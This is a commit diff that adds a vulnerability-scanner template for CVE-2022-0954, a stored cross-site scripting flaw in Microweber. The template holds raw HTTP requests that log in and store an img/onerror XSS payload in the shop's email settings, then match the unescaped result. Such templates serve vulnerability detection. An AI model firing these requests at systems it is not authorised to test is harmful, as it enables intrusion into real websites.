commit
f5b3587750
|
@ -0,0 +1,55 @@
|
|||
id: microweber-stored-xss
|
||||
|
||||
info:
|
||||
name: Microweber - Cross-site Scripting
|
||||
author: amit-jd
|
||||
severity: medium
|
||||
description: Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Autorespond E-mail Settings.
|
||||
reference:
|
||||
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
|
||||
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 6.8
|
||||
cwe-id: CWE-79
|
||||
cve-id: CVE-2022-0954
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,xss,microweber,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/user_login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
POST /api/save_option HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Referer: {{BaseURL}}admin/view:settings
|
||||
|
||||
option_key=email_from&option_group=email&option_value=%22%3E%3Cimg+src%3D%22x%22+onerror%3D%22alert(document.domain)%3B%22%3E&module=settings%2Fgroup%2Femail
|
||||
|
||||
- |
|
||||
POST /module/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Referer: {{BaseURL}}admin/view:shop/action:options
|
||||
|
||||
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend&class=card-body+pt-3&option_group=email&is_system=1&style=position%3A+relative%3B
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2,"true")'
|
||||
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder')
|
||||
- 'contains(all_headers_3,"text/html")'
|
||||
- 'status_code_3==200'
|
||||
condition: and
|
Loading…
Reference in New Issue